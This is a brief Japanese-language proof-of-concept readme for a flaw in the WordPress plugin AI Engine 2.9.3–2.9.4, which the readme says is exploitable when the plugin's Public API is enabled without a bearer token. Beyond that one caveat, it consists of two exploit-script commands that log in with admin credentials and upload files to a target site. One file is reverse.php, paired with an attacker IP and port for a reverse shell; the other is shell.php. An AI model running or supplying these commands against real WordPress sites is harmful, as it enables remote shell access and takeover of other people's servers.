
Wordpress Plugin AI Engine 2.9.3 - 2.9.4 概念実証
WordPressプラグイン AI Engine 2.9.3 - 2.9.4 概念実証
この脆弱性は、「Public API」オプションが有効になっている場合にのみ悪用可能であることに注意してください。このオプションはデフォルトでは無効であり、またBearer Tokenが設定されておらず、カスタム認証が追加されてAPIを保護していない場合に限ります。
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444
python3 exploit.py \
--url "http://target.com/" \
--username "Admin" \
--password "L87*********C4u" \
--file shell.php